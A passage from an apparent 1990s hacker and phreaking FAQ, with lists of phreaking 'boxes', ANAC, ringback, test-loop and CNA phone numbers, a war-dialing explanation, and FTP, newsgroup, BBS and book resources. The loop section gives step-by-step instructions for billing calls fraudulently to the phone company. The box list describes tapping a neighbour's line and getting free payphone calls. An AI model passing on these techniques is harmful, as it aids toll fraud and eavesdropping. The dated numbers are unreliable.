                                    Rainbow      Kill a trace by putting 120v into the phone line (joke)
                                    Razz         Tap into your neighbors phone
                                    Red          Make free phone calls from pay phones by generating
                                    quarter tones
                                    Rock         Add music to your phone line
                                    Scarlet      Cause a neighbors phone line to have poor reception
                                    Silver       Create the DTMF tones for A, B, C and D
                                    Static       Keep the voltage on a phone line high
                                    Switch       Add hold, indicator lights, conferencing, etc..
                                    Tan          Line activated telephone recorder
                                    Tron         Reverse the phase of power to your house, causing your
                                    electric meter to run slower
                                    TV Cable     "See" sound waves on your TV
                                    Urine        Create a capacitative disturbance between the ring and
                                    tip wires in another's telephone headset
                                    Violet       Keep a payphone from hanging up
                                    White        Portable DTMF keypad
                                    Yellow       Add an extension phone
                                    
                                    
                                    09. What is the ANAC number for my area?
                                    
                                    How to find your ANAC number:
                                    
                                    Look up your NPA (Area Code) and try the number listed for it. If that
                                    fails, try 1 plus the number listed for it.  If that fails, try the
                                    common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
                                    number for your area, please let us know.
                                    
                                    Note that many times the ANAC number will vary for different
                                    switches in the same city.
                                    
                                    A trick to getting the number of the phone line you are calling from
                                    is to call an (800) phone sex line.  Example: (800)571-8859.  These
                                    systems will give you an account number, which in many cases includes
                                    the telephone number of the phone from which you are calling.
                                    
                                    Another useful 800 ANAC number is the Duke Power Company Automated
                                    Outage System at (800)769-3766.  The system will read back to you
                                    the phone number from which you are calling.
                                    
                                    Even another 800 ANAC number is Info Access Telephone Company's
                                    Automated Blocking line at (800)568-3197.  It will read back to
                                    you the number from which you are calling, and ask if you would like
                                    it blocked.
                                    
                                    (800)3282-630 is another sex line that will give you (after a bit of
                                    work) the last four digits of the phone number you are calling from.
                                    
                                    An non-800 ANAC that works nationwide is 404-988-9664.
                                    
                                    Please use local ANAC numbers if you can, as abuse or overuse kills
                                    800 ANAC numbers.
                                    
                                    
                                    NPA  ANAC number      Comments
                                    ---  ---------------  ---------------------------------------------
                                    202  958-xxxx         Dictrict of Columbia
                                    203  960              CT (All)
                                    203  970              CT (All)
                                    204  644-xxxx         Manitoba
                                    205  908-222-2222     Birmingham, AL
                                    206  411              WA /* Not US West */
                                    207  958              ME (All)
                                    209  830              Stockton, CA
                                    212  958              Manhattan, NY
                                    213  114              Los Angeles, CA
                                    213  1223             Los Angeles, CA /* some 1AESS switches */
                                    213  211-2345         Los Angeles, CA /* English response */
                                    213  211-2346         Los Angeles, CA /* DTMF response */
                                    213  61056            Los Angeles, CA
                                    214  790              Dallas, TX /* GTE */
                                    214  970-222-2222     Dallas, TX
                                    214  970-611-1111     Dallas, TX /* Southwestern Bell */
                                    215  410-xxxx         Philadelphia, PA
                                    217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
                                    301  958-9968         Hagerstown/Rockville, MD
                                    305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
                                    309  200-xxx-xxxx     Peoria/Rock Island, IL
                                    310  114              Long Beach, CA /* on many GTE switches */
                                    310  1223             Long Beach, CA /* some 1AESS switches */
                                    310  211-2345         Long Beach, CA /* English response */
                                    310  211-2346         Long Beach, CA /* DTMF response */
                                    312  200              Chicago, IL
                                    312  290              Chicago, IL
                                    312  1-200-8825       Chicago, IL (Last four change rapidly)
                                    313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
                                    313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
                                    313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
                                    313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
                                    314  511              Columbia/Jefferson City, MO
                                    317  310-222-2222     Indianapolis/Kokomo, IN
                                    317  743-1218         Indianapolis/Kokomo, IN
                                    401  222-2222         RI (All)
                                    402  311              Lincoln, NE
                                    403  311              Alberta, Yukon and N.W. Territory
                                    403  908-222-2222     Alberta, Yukon and N.W. Territory
                                    403  999              Alberta, Yukon and N.W. Territory
                                    404  311              Atlanta, GA
                                    404  940-xxx-xxxx     Atlanta, GA
                                    405  897              Enid/Oklahoma City, OK
                                    407  200-222-2222     Orlando/West Palm Beach, FL
                                    408  300-xxx-xxxx     San Jose, CA
                                    408  760              San Jose, CA
                                    408  940              San Jose, CA
                                    409  951              Beaumont/Galveston, TX
                                    409  970-xxxx         Beaumont/Galveston, TX
                                    410  200-6969         Annapolis/Baltimore, MD
                                    410  200-555-1212     Annapolis/Baltimore, MD
                                    410  811              Annapolis/Baltimore, MD
                                    412  711-6633         Pittsburgh, PA
                                    412  711-4411         Pittsburgh, PA
                                    412  999-xxxx         Pittsburgh, PA
                                    413  958              Pittsfield/Springfield, MA
                                    413  200-555-5555     Pittsfield/Springfield, MA
                                    414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
                                    415  200-555-1212     San Francisco, CA
                                    415  211-2111         San Francisco, CA
                                    415  2222             San Francisco, CA
                                    415  640              San Francisco, CA
                                    415  760-2878         San Francisco, CA
                                    415  7600-2222        San Francisco, CA
                                    419  311              Toledo, OH
                                    502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
                                    503  611              Portland, OR  /* not all parts of town */
                                    508  958              Fall River/New Bedford/Worchester, MA
                                    508  200-222-1234     Fall River/New Bedford/Worchester, MA
                                    508  200-222-2222     Fall River/New Bedford/Worchester, MA
                                    509  560              Spokane/Walla Walla/Yakima, WA
                                    512  200-222-2222     Austin/Corpus Christi, TX
                                    512  830              Austin/Corpus Christi, TX
                                    512  970-xxxx         Austin/Corpus Christi, TX
                                    515  5463             Des Moines, IA
                                    516  958              Hempstead/Long Island, NY
                                    516  968              Hempstead/Long Island, NY
                                    517  200-222-2222     Bay City/Jackson/Lansing, MI
                                    517  200200200200200  Bay City/Jackson/Lansing, MI
                                    518  997              Albany/Schenectady/Troy, NY
                                    518  998              Albany/Schenectady/Troy, NY
                                    602  593-0809         Phoenix, AZ
                                    602  593-6017         Phoenix, AZ
                                    602  593-7451         Phoenix, AZ
                                    603  200-222-2222     NH (All)
                                    606  997-555-1212     Ashland/Winchester, KY
                                    607  993              Binghamton/Elmira, NY
                                    609  958              Atlantic City/Camden/Trenton/Vineland, NJ
                                    612  511              Minneapolis/St.Paul, MN
                                    615  200200200200200  Nashville, TN
                                    615  830              Nashville, TN
                                    616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
                                    617  200-222-1234     Boston, MA
                                    617  200-222-2222     Boston, MA
                                    617  200-444-4444     Boston, MA /* Woburn, MA */
                                    617  220-2622         Boston, MA
                                    617  958              Boston, MA
                                    618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
                                    708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
                                    708  356-9646         Chicago/Elgin, IL
                                    713  970-xxxx         Houston, TX
                                    714  211-2121         Anaheim, CA /* GTE */
                                    716  511              Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */
                                    717  958              Harrisburg/Scranton/Wilkes-Barre, PA
                                    718  958              Bronx/Brooklyn/Queens/Staten Island, NY
                                    802  2-222-222-2222   Vermont (All)
                                    802  200-222-2222     Vermont (All)
                                    805  830              San Luis Obispo, CA
                                    806  970-xxxx         Amarillo/Lubbock, TX
                                    810  200200200200200  Michigan
                                    812  410-555-1212     Evansville, IN
                                    813  311              Ft. Meyers/St. Petersburg/Tampa, FL
                                    815  200-xxx-xxxx     La Salle/Rockford, IL
                                    815  290              La Salle/Rockford, IL
                                    817  211              Ft. Worth/Waco, TX
                                    817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */
                                    818  1223             Pasadena, CA /* some 1AESS switches */
                                    818  211-2345         Pasadena, CA /* English response */
                                    818  211-2346         Pasadena, CA /* DTMF response */
                                    906  200-222-2222     Marquette/Sault Ste. Marie, MI
                                    908  958              New Brunswick, NJ
                                    910  311              Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
                                    910  988              Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
                                    914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
                                    915  970-xxxx         Abilene/El Paso, TX
                                    919  711              Durham, NC
                                    
                                    
                                    Canada:
                                    306  115              Saskatchewan, Canada
                                    416  410-xxxx         Toronto, Ontario
                                    416  997-xxxx         Toronto, Ontario
                                    514  320-xxxx         Montreal, Quebec
                                    519  320-xxxx         London, Ontario
                                    604  1116             British Columbia, Canada
                                    604  1211             British Columbia, Canada
                                    604  211              British Columbia, Canada
                                    613  320-2232         Ottawa, Ontario
                                    705  320-xxxx         Saulte Ste. Marie, Ontario
                                    
                                    Australia:
                                    +61  03-552-4111      Victoria 03 area
                                    +61  19123            All major capital cities
                                    
                                    United Kingdom:
                                    175
                                    
                                    
                                    10. What is a ringback number?
                                    
                                    A ringback number is a number that you call that will immediately
                                    ring the telephone from which it was called.
                                    
                                    In most instances you must call the ringback number, quickly hang up
                                    the phone for just a short moment and then let up on the switch, you
                                    will then go back off hook and hear a different tone.  You may then
                                    hang up.  You will be called back seconds later.
                                    
                                    
                                    11. What is the ringback number for my area?
                                    
                                    An 'x' means insert those numbers from the phone number from which you
                                    are calling.  A '?' means that the number varies from switch to switch
                                    in the area, or changes from time to time.  Try all possible
                                    combinations.
                                    
                                    201  551-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
                                    202  958-xxxx         District of Columbia
                                    203  991-xxxx         CT (All)
                                    209  890-xxxx         Stockton, CA
                                    213  1-95x-xxxx       Los Angeles, CA
                                    301  958-xxxx         Hagerstown/Rockville, MD
                                    303  99X-xxxx         Grand Junction, CO
                                    312  511-xxxx         Chicago, IL
                                    312  511-xxx-xxxx     Chicago, IL
                                    312  57?-xxxx         Chicago, IL
                                    412  985-xxxx         Pittsburgh, PA
                                    415  350-xxxx         San Francisco, CA
                                    501  721-xxx-xxxx     AR (All)
                                    502  988              Lexington, KY
                                    504  9988776655       Baton Rouge/New Orleans, LA
                                    512  95X-xxxx         Austin, TX
                                    601  777-xxxx         MS (All)
                                    609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
                                    619  331-xxxx         San Diego, CA
                                    619  332-xxxx         San Diego, CA
                                    703  958-xxxx         Alexandria/Arlington/Roanoke, VA
                                    716  981-xxxx         Rochester, NY /* Rochester Tel */
                                    719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
                                    801  938-xxxx         Utah (All)
                                    801  939-xxxx         Utah (All)
                                    805  114              Bakersfield/Santa Barbara, CA
                                    813  711              Ft. Meyers/St. Petersburg/Tampa, FL
                                    908  55?-xxxx         New Brunswick, NJ
                                    914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
                                    
                                    Canada:
                                    416  57x-xxxx         Toronto, Ontario
                                    416  99x-xxxx         Toronto, Ontario
                                    416  999-xxx-xxxx     Toronto, Ontario
                                    514  320-xxx-xxxx     Montreal, Quebec
                                    613  999-xxx-xxxx     Ottawa, Ontario
                                    
                                    Australia:
                                    +61 199
                                    
                                    United Kingdom:
                                    174
                                    
                                    
                                    12. What is a loop?
                                    
                                    This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
                                    by Minor Threat & Mucho Maas
                                    
                                    Loops are a pair of phone numbers, usually consecutive, like 836-9998
                                    and 836-9999.  They are used by the phone company for testing.  What
                                    good do loops do us?  Well, they are cool in a few ways.  Here is a
                                    simple use of loops.  Each loop has two ends, a 'high' end, and a
                                    'low' end.  One end gives a (usually) constant, loud tone when it is
                                    called. The other end is silent.  Loops don't usually ring either.
                                    When BOTH ends are called, the people that called each end can talk
                                    through the loop.  Some loops are voice filtered and won't pass
                                    anything but a constant tone; these aren't much use to you.  Here's
                                    what you can use working loops for:  billing phone calls!  First, call
                                    the end that gives the loud tone.  Then if the operator or someone
                                    calls the other end, the tone will go quiet.  Act like the phone just
                                    rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
                                    what the fuck ever.  The operator thinks that she just called you, and
                                    that's it!  Now the phone bill will go to the loop, and your local
                                    RBOC will get the bill!  Use this technique in moderation, or the loop
                                    may go down.  Loops are probably most useful when you want to talk to
                                    someone to whom you don't want to give your phone number.
                                    
                                    
                                    13. What is a loop in my area?
                                    
                                    Many of these loops are no longer functional.  If you are local
                                    to any of these loops, please try them out an e-mail me the results
                                    of your research.
                                    
                                    NPA    High      Low
                                    ---  --------  --------
                                    201  228-9929  228-9930
                                    201  238-9929  238-9930
                                    201  251-9929  251-9930
                                    201  254-9929  254-9930
                                    201  272-9929  272-9930
                                    201  330-9929  330-9930
                                    201  333-9929  333-9930
                                    201  339-9929  339-9930
                                    201  347-9929  347-9930
                                    201  376-9929  376-9930
                                    201  398-9929  398-9930
                                    201  467-9929  467-9930
                                    201  528-9929  528-9930
                                    201  558-9929  558-9930
                                    201  559-9929  559-9930
                                    201  560-9929  560-9930
                                    201  592-9929  592-9930
                                    201  625-9929  625-9930
                                    201  631-9929  631-9930
                                    201  637-9929  637-9930
                                    201  655-9929  655-9930
                                    201  666-9929  666-9930
                                    201  690-9929  690-9930
                                    201  761-9929  761-9930
                                    201  762-9929  762-9929
                                    201  762-9929  762-9930
                                    201  762-9929  762-9929
                                    201  763-9929  763-9930
                                    201  764-9929  764-9930
                                    201  767-9929  767-9930
                                    201  768-9929  768-9930
                                    201  773-9929  773-9930
                                    201  879-9929  879-9930
                                    201  946-9929  946-9930
                                    201  992-9929  992-9930
                                    201  993-9929  993-9930
                                    201  994-9929  994-9930
                                    213  360-1118  360-1119
                                    213  365-1118  365-1119
                                    213  455-0002  455-xxxx
                                    213  455-0002  455-XXXX
                                    213  546-0002  546-XXXX
                                    213  546-0002  546-xxxx
                                    305  778-9952  778-9951
                                    305  964-9951  964-9952
                                    312  222-9973  222-9974
                                    312  234-9973  234-9974
                                    313  224-9996  224-9997
                                    313  225-9996  225-9997
                                    313  234-9996  234-9997
                                    313  237-9996  237-9997
                                    313  256-9996  256-9997
                                    313  272-9996  272-9997
                                    313  273-9996  273-9997
                                    313  277-9996  277-9997
                                    313  281-9996  281-9997
                                    313  292-9996  292-9997
                                    313  299-9996  299-9997
                                    313  321-9996  321-9997
                                    313  326-9996  326-9997
                                    313  356-9996  356-9997
                                    313  362-9996  362-9997
                                    313  369-9996  369-9997
                                    313  388-9996  388-9997
                                    313  397-9996  397-9997
                                    313  399-9996  399-9997
                                    313  445-9996  445-9997
                                    313  465-9996  465-9997
                                    313  471-9996  471-9997
                                    313  474-9996  474-9997
                                    313  477-9996  477-9997
                                    313  478-9996  478-9997
                                    313  483-9996  483-9997
                                    313  497-9996  497-9997
                                    313  526-9996  526-9997
                                    313  552-9996  552-9997
                                    313  556-9996  556-9997
                                    313  561-9996  561-9997
                                    313  569-9996  569-9996
                                    313  575-9996  575-9997
                                    313  577-9996  577-9997
                                    313  585-9996  585-9997
                                    313  591-9996  591-9997
                                    313  621-9996  621-9997
                                    313  626-9996  626-9997
                                    313  644-9996  644-9997
                                    313  646-9996  646-9997
                                    313  647-9996  647-9997
                                    313  649-9996  649-9997
                                    313  663-9996  663-9997
                                    313  665-9996  665-9997
                                    313  683-9996  683-9997
                                    313  721-9996  721-9997
                                    313  722-9996  722-9997
                                    313  728-9996  728-9997
                                    313  731-9996  731-9997
                                    313  751-9996  751-9997
                                    313  776-9996  776-9997
                                    313  781-9996  781-9997
                                    313  787-9996  787-9997
                                    313  822-9996  822-9997
                                    313  833-9996  833-9997
                                    313  851-9996  851-9997
                                    313  871-9996  871-9997
                                    313  875-9996  875-9997
                                    313  886-9996  886-9997
                                    313  888-9996  888-9997
                                    313  898-9996  898-9997
                                    313  934-9996  934-9997
                                    313  942-9996  942-9997
                                    313  963-9996  963-9997
                                    313  977-9996  977-9997
                                    313  995-9996  995-9997
                                    402  422-0001  422-0002
                                    402  422-0005  422-0006
                                    402  422-0007  422-0008
                                    402  422-0003  422-0004
                                    402  422-0005  422-0006
                                    402  422-0007  422-0008
                                    402  422-0009  ALL-PREF
                                    402  422-0003  422-0004
                                    402  422-0009  ALL-PREF
                                    402  422-0001  422-0002
                                    402  572-0003  572-0004
                                    517  422-9996  422-9997
                                    517  423-9996  423-9997
                                    517  455-9996  455-9997
                                    517  563-9996  563-9997
                                    517  663-9996  663-9997
                                    517  851-9996  851-9997
                                    609  921-9929  921-9930
                                    609  994-9929  994-9930
                                    616  997-9996  997-9997
                                    616  ALL-PREF  ALL-PREF
                                    713  224-1499  759-1799
                                    713  324-1499  324-1799
                                    713  342-1499  342-1799
                                    713  351-1499  351-1799
                                    713  354-1499  354-1799
                                    713  356-1499  356-1799
                                    713  442-1499  442-1799
                                    713  447-1499  447-1799
                                    713  455-1499  455-1799
                                    713  458-1499  458-1799
                                    713  462-1499  462-1799
                                    713  466-1499  466-1799
                                    713  468-1499  468-1799
                                    713  469-1499  469-1799
                                    713  471-1499  471-1799
                                    713  481-1499  481-1799
                                    713  482-1499  482-1799
                                    713  484-1499  484-1799
                                    713  487-1499  487-1799
                                    713  489-1499  489-1799
                                    713  492-1499  492-1799
                                    713  493-1499  493-1799
                                    713  524-1499  524-1799
                                    713  526-1499  526-1799
                                    713  555-1499  555-1799
                                    713  661-1499  661-1799
                                    713  664-1499  664-1799
                                    713  665-1499  665-1799
                                    713  666-1499  666-1799
                                    713  667-1499  667-1799
                                    713  682-1499  976-1799
                                    713  771-1499  771-1799
                                    713  780-1499  780-1799
                                    713  781-1499  997-1799
                                    713  960-1499  960-1799
                                    713  977-1499  977-1799
                                    713  988-1499  988-1799
                                    714  535-1118  535-1119
                                    714  538-1118  538-1119
                                    714  858-1118  858-1119
                                    714  879-1118  879-1119
                                    805  528-0044  528-0045
                                    805  544-0044  544-0045
                                    805  773-0044  773-0045
                                    813  385-9971
                                    908  776-9930  776-9930
                                    
                                    
                                    14. What is a CNA number?
                                    
                                    CNA stands for Customer Name and Address.  The CNA number is a phone
                                    number for telephone company personnel to call and get the name and
                                    address for a phone number.  If a telephone lineman finds a phone line
                                    he does not recognize, he can use the ANI number to find it's phone
                                    number and then call the CNA operator to see who owns it and where
                                    they live.
                                    
                                    Normal CNA numbers are available only to telephone company personnel.
                                    Private citizens may now legally get CNA information from private
                                    companies.  Two such companies are:
                                    
                                    Unidirectory    (900)933-3330
                                    Telename        (900)884-1212
                                    
                                    Note that these are 900 numbers, and will cost you approximately one
                                    dollar per minute.
                                    
                                    
                                    15. What is the telephone company CNA number for my area?
                                    
                                    203  203-771-8080     CT (All)
                                    614  614-464-0123     Columbus/Steubenville, OH
                                    813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
                                    
                                    
                                    16. What is scanning?
                                    
                                    Scanning is dialing a large number of telephone numbers in the hope
                                    of finding interesting carriers (computers) or tones.
                                    
                                    Scanning can be done by hand, although dialing several thousand
                                    telephone numbers by hand is extremely boring and takes a long time.
                                    
                                    Much better is to use a scanning program, sometimes called a war
                                    dialer or a demon dialer.  Currently, the best war dialer available
                                    to PC-DOS users is ToneLoc .99b8.
                                    
                                    A war dialer will dial a range of numbers and log what it finds at
                                    each number.  You can then only dial up the numbers that the war
                                    dialer marked as carriers or tones.
                                    
                                    
                                    17. Is scanning illegal?
                                    
                                    Excerpt from: 2600, Spring 1990, Page 27:
                                    
                                    -BQ-
                                    In some places, scanning has been made illegal.  It would be hard,
                                    though, for someone to file a complaint against you for scanning since
                                    the whole purpose is to call every number once and only once.  It's
                                    not likely to be thought of as harassment by anyone who gets a single
                                    phone call from a scanning computer.  Some central offices have been
                                    known to react strangely when people start scanning.  Sometimes you're
                                    unable to get a dialtone for hours after you start scanning.  But
                                    there is no uniform policy.  The best thing to do is to first find out
                                    if you've got some crazy law saying you can't do it.  If, as is
                                    likely, there is no such law, the only way to find out what happens is
                                    to give it a try.
                                    -EQ-
                                    
                                    It should be noted that a law making scanning illegal was recently
                                    passed in Colorado Springs, CO.  It is now illegal to place a call
                                    in Colorado Springs without the intent to communicate.
                                    
                                    
                                    18. Where can I purchase a lineman's handset?
                                    
                                    Time Motion Tools
                                    12778 Brookprinter Place
                                    Poway, CA 92064
                                    (619)679-0303
                                    
                                    Contact East
                                    335 Willow Street
                                    North Andover, MA 01845-5995
                                    (508)682-2000
                                    
                                    
                                    
                                    DTMF stands for Dual Tone Multi Frequency.  These are the tones you
                                    get when you press a key on your telephone touchpad.  The tone of the
                                    button is the sum of the column and row tones.  The ABCD keys do not
                                    exist on standard telephones.
                                    
                                    1209 1336 1477 1633
                                    
                                    697   1    2    3    A
                                    
                                    770   4    5    6    B
                                    
                                    852   7    8    9    C
                                    
                                    941   *    0    #    D
                                    
                                    
                                    
                                    
                                    Section C: Resources
                                    ~~~~~~~~~~~~~~~~~~~~
                                    
                                    
                                    01. What are some ftp sites of interest to hackers?
                                    
                                    aql.gatech.edu
                                    bellcore.com
                                    cert.org
                                    crimelab.com
                                    cyberspace.com
                                    deimos.cs.uah.edu
                                    freeside.com
                                    ftp.csua.berkeley.edu   /pub/cypherpunks
                                    ftp.eff.org             /pub/cud
                                    ftp.etext.org
                                    ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples
                                    ftp.netcom.com          /pub/bradleym
                                    ftp.netcom.com          /pub/zzyzx
                                    ftp.rahul.net           /pub/lps
                                    ftp.std.com             /obi/Mischief/
                                    ftp.std.com             /archives/alt.locksmithing
                                    ftp.warwick.ac.uk
                                    ftp.win.tue.nl
                                    ftp.winternet.com       /users/craigb
                                    garbo.uwasa.fi          /pc/crypt
                                    ghost.dsi.unimi.it      /pub/crypt
                                    grind.isca.uiwa.edu
                                    hack-this.pc.cc.cmu.edu
                                    halcyon.com
                                    ideal.ios.net
                                    lcs.mit.edu             /* Telecom archives */
                                    mary.iia.org            /pub/users/patriot
                                    nic.funet.fi            /pub/doc/cud
                                    paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics/
                                    pyrite.rutgers.edu
                                    ripem.msu.edu           /pub/crypt
                                    rtfm.mit.edu
                                    sekurity.com
                                    spy.org
                                    theta.iis.u-tokyo.ac.jp /pub1/security
                                    vincent2.iastate.edu    login: anonymous.mabell /* Closed for the Summer */
                                    wimsey.bc.ca            /pub/crypto
                                    
                                    Here is the list again, this time in .netrc format:
                                    
                                    machine  aql.gatech.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  bellcore.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  cert.org
                                    login    anonymous
                                    password root@
                                    
                                    machine  crimelab.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  cyberspace.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  deimos.cs.uah.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.csua.berkeley.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.eff.org
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.etext.org
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.mcs.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.netcom.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.netcom.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.rahul.net
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.std.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.std.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.warwick.ac.uk
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.win.tue.nl
                                    login    anonymous
                                    password root@
                                    
                                    machine  ftp.winternet.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  garbo.uwasa.fi
                                    login    anonymous
                                    password root@
                                    
                                    machine  ghost.dsi.unimi.it
                                    login    anonymous
                                    password root@
                                    
                                    machine  grind.isca.uiwa.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  hack-this.pc.cc.cmu.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  halcyon.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  ideal.ios.net
                                    login    anonymous
                                    password root@
                                    
                                    machine  lcs.mit.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  mary.iia.org
                                    login    anonymous
                                    password root@
                                    
                                    machine  nic.funet.fi
                                    login    anonymous
                                    password root@
                                    
                                    machine  paradox1.denver.colorado.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  ripem.msu.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  pyrite.rutgers.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  rtfm.mit.edu
                                    login    anonymous
                                    password root@
                                    
                                    machine  sekurity.com
                                    login    anonymous
                                    password root@
                                    
                                    machine  spy.org
                                    login    anonymous
                                    password root@
                                    
                                    machine  theta.iis.u-tokyo.ac.jp
                                    login    anonymous
                                    password root@
                                    
                                    machine  vincent2.iastate.edu
                                    login    anonymous
                                    password mabell
                                    
                                    machine  wimsey.bc.ca
                                    login    anonymous
                                    password root@
                                    
                                    
                                    02. What are some newsgroups of interest to hackers?
                                    
                                    alt.2600                Do it 'til it hertz
                                    alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
                                    alt.cellular
                                    alt.dcom.telecom
                                    alt.hackers             Descriptions of projects currently under
                                    development (Moderated)
                                    alt.locksmithing        You locked your keys in *where*?
                                    alt.hackers.malicious   The really bad guys - don't take candy from them
                                    alt.security            Security issues on computer systems
                                    alt.security.index      Pointers to good stuff in misc.security (Moderated)
                                    alt.security.keydist    Exchange of keys for public key encryption systems
                                    alt.security.pgp        The Pretty Good Privacy package
                                    alt.security.ripem      A secure email system illegal to export from the US
                                    comp.dcom.cellular
                                    comp.dcom.telcom.tech
                                    comp.dcom.telecom       Telecommunications digest (Moderated)
                                    comp.dcom.telecom.tech
                                    comp.org.cpsr.announce
                                    comp.org.cpsr.talk
                                    comp.org.eff
                                    comp.org.eff
                                    comp.risks
                                    comp.security.announce
                                    comp.security.misc      Security issues of computers and networks
                                    comp.security.unix      Discussion of Unix security
                                    comp.virus              Computer viruses & security (Moderated)
                                    misc.security           Security in general, not just computers (Moderated)
                                    rec.pyrotechnics
                                    sci.crypt               Different methods of data en/decryption
                                    
                                    
                                    03. What are some telnet sites of interest to hackers?
                                    
                                    phred.pc.cc.cmu.edu
                                    
                                    
                                    04. What are some gopher sites of interest to hackers?
                                    
                                    gopher@cpsr.org
                                    gopher.eff.org
                                    gopher.wired.com
                                    wiretap.spies.com
                                    
                                    
                                    05. What are some World wide Web (WWW) sites of interest to hackers?
                                    
                                    http://crimelab.com//bugtraq/bugtraq/html
                                    http://cs.purdue.edu/homes/spaf/coast.html
                                    http://cs.purdue.edu/homes/spaf/pcert.html
                                    http://dfw.net/~aleph1
                                    http://first.org
                                    http://l0pht.com
                                    http://tamsun.tamu.edu/~clm3840/hacking.html/
                                    http://tansu.com.au/Info/security.html
                                    http://www.achilles.net/~pluvius
                                    http://www.cis.ksu.edu/~psiber
                                    http://www.tis.com/
                                    http://www.cpsr.org/home
                                    http://www.iia.org/~gautier/me.html
                                    http://www.engin.umich.edu/~jgotts/underground.html
                                    http://www.net23.com
                                    http: /www.paranoia.com /defcon
                                    http://www.phantom.com/~king
                                    http://www.spy.org /Security/Local/News
                                    http://www.wired.com
                                    
                                    
                                    06. What are some IRC channels of interest to hackers?
                                    
                                    #2600
                                    #hack
                                    #phreak
                                    #linux
                                    #root
                                    #unix
                                    #warez
                                    
                                    
                                    07. What are some BBS's of interest to hackers?
                                    
                                    Home BBS                (303)343-4053
                                    fARM R0Ad 666           (713)855-0261
                                    Corrupt Sekurity        (303)753-1719
                                    
                                    
                                    08. What books are available on this subject?
                                    
                                    
                                    General Computer Security
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~
                                    Computer Security Basics
                                    Author: Deborah Russell and G.T. Gengemi Sr.
                                    Publisher: O'Reilly & Associates, Inc.
                                    Copyright Date: 1991
                                    ISBN: 0-937175-71-4
                                    
                                    This is an excellent book.  It gives a broad overview of
                                    computer security without sacrificing detail.  A must read for
                                    the beginning security expert.
                                    
                                    Computer Security Management
                                    Author: Karen Forcht
                                    Publisher: Boyd and Fraser
                                    Copyright Date: 1994
                                    ISBN: 0-87835-881-1
                                    
                                    Information Systems Security
                                    Author: Philip Fites and Martin Kratz
                                    Publisher: Van Nostrad Reinhold
                                    Copyright Date: 1993
                                    ISBN: 0-442-00180-0
                                    
                                    
                                    Unix System Security
                                    ~~~~~~~~~~~~~~~~~~~~
                                    Practical Unix Security
                                    Author: Simson Garfinkel and Gene Spafford
                                    Publisher: O'Reilly & Associates, Inc.
                                    Copyright Date: 1991
                                    ISBN: 0-937175-72-2
                                    
                                    Finally someone with a very firm grasp of Unix system security
                                    gets down to writing a book on the subject.  Buy this book.
                                    Read this book.
                                    
                                    Firewalls and Internet Security
                                    Author: William Cheswick and Steven Bellovin
                                    Publisher: Addison Wesley
                                    Copyright Date: 1994
                                    ISBN: 0-201-63357-4
                                    
                                    Unix System Security
                                    Author: Rik Farrow
                                    Publisher: Addison Wesley
                                    Copyright Date: 1991
                                    ISBN: 0-201-57030-0
                                    
                                    Unix Security: A Practical Tutorial
                                    Author: N. Derek Arnold
                                    Publisher: McGraw Hill
                                    Copyright Date: 1993
                                    ISBN: 0-07-002560-6
                                    
                                    Unix System Security: A Guide for Users and Systems Adiministrators
                                    Author: David A. Curry
                                    Publisher: Addison-Wesley
                                    Copyright Date: 1992
                                    ISBN: 0-201-56327-4
                                    
                                    Unix System Security
                                    Author: Patrick H. Wood and Stephen G. Kochan
                                    Publisher: Hayden Books
                                    Copyright Date: 1985
                                    ISBN: 0-672-48494-3
                                    
                                    
                                    Network Security
                                    ~~~~~~~~~~~~~~~~
                                    Network Security Secrets
                                    Author: David J. Stang and Sylvia Moon
                                    Publisher: IDG Books
                                    Copyright Date: 1993
                                    ISBN: 1-56884-021-7
                                    
                                    Not a total waste of paper, but definitely not worth the
                                    $49.95 purchase price.  The book is a rehash of previously
